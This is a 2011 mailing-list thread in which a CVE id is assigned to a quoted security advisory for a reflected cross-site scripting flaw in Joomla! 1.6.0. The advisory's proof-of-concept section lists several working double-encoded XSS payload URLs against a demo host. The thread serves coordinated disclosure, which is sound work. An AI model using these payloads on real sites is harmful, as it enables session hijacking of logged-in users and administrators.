Re: CVE Request: Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability

[YGN Ethical Hacker Group <lists () yehg net>]

I didn't happen to ask CVE for Joomla 1.5.20.
Please assign new one or tie this CVE also that 1.5.20.

Thanks!


On Tue, Mar 15, 2011 at 4:51 AM, Josh Bressers <bressers () redhat com> wrote:
> Please use CVE-2011-1152
>
> Did the original report for 1.5.20 get a CVE id? (I couldn't find one)
>
> Thanks.
>
> --
>    JB
>
>
> ----- Original Message -----
> > ==========================================
> > Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability
> > ==========================================
> >
> >
> > 1. OVERVIEW
> >
> > Joomla! 1.6.0 was vulnerable to Cross Site Scripting.
> >
> >
> > 2. PRODUCT DESCRIPTION
> >
> > Joomla is a free and open source content management system (CMS) for
> > publishing content on the World Wide Web and intranets. It comprises a
> > model–view–controller (MVC) Web application framework that can also be
> > used independently.
> > Joomla is written in PHP, uses object-oriented programming (OOP)
> > techniques and software design patterns, stores data in a MySQL
> > database, and includes features such as page caching, RSS feeds,
> > printable versions of pages, news flashes, blogs, polls, search, and
> > support for language internationalization.
> >
> >
> > 3. VULNERABILITY DESCRIPTION
> >
> > The Query String parameter was not properly sanitized upon submission
> > to the /index.php url, which allows attacker to conduct Cross Site
> > Scripting attack. This may allow an attacker to create a specially
> > crafted URL that would execute arbitrary script code in a victim's
> > browser.
> >
> >
> > 4. VERSION AFFECTED
> >
> > Joomla! 1.6.0
> >
> >
> > 5. PROOF-OF-CONCEPT/EXPLOIT
> >
> > > > > SEO-enabled Joomla 1.6.0
> >
> > http://attacker.in/joomla160/index.php/%2522%253E%253Cimg%2520src%253Da%2520onerror%253Dalert(String.fromCharCode(88,83,83))%253E09739572178%252F
> >
> > http://attacker.in/joomla160/index.php/using-joomla/extensions/components/search-component/search/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E
> >
> > http://attacker.in/joomla160/index.php/contact-us/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E
> >
> > http://attacker.in/joomla160/index.php/park-links?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1
> >
> > http://attacker.in/joomla160/index.php/using-joomla/extensions/templates?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1
> >
> >
> > > > > SEO-disabled Joomla 1.6.0
> >
> > http://attacker.in/joomla160x/index.php?option=com_weblinks&view=category&id=18&Itemid=227&a86a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9666d64388c=1
> >
> > http://attacker.in/joomla160x/index.php?option=com_content&view=category&layout=blog&id=21&Itemid=268&%2522%253e%253cscript%253ealert%280%29%253c/script%253e=XSS
> >
> >
> > This is the exactly same variant as shown in our last year demo video
> > in 1.5.20:
> >
> > http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/
> >
> > We thought Joomla! team would fix this issue in 1.6.0 stable release
> > whilst they fixed it in Joomla! 1.5.21!
> >
> >
> > 6. IMPACT
> >
> > Attackers can compromise currently logged-in user/administrator
> > session and impersonate arbitrary user actions available under
> > /administrator/ functions.
> >
> >
> > 7. SOLUTION
> >
> > Upgrade to Joomla! 1.6.1 or higher
> >
> >
> > 8. VENDOR
> >
> > Joomla! Developer Team
> > http://www.joomla.org
> >
> >
> > 9. CREDIT
> >
> > This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
> > Ethical Hacker Group, Myanmar.
> >
> >
> > 10. DISCLOSURE TIME-LINE
> >
> > 2011-01-24: notified vendor
> > 2011-03-08: vendor released fix
> > 2011-03-14: vulnerability disclosed
> >
> >
> > 11. REFERENCES
> >
> > Original Advisory URL:
> > http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_cross_site_scripting(XSS)
> > Former Advisory URL:
> > http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5.20]_cross_site_scripting(XSS)
> > XSS FAQ: http://www.cgisecurity.com/xss-faq.html
> > OWASP Top 10:
> > http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
> > CWE-79: http://cwe.mitre.org/data/definitions/79.html
> >
> >
> > #yehg [2011-03-14]
> >
> >
> >
> >
> > ---------------------------------
> > Best regards,
> > YGN Ethical Hacker Group
> > Yangon, Myanmar
> > http://yehg.net
> > Our Lab | http://yehg.net/lab
> > Our Directory | http://yehg.net/hwd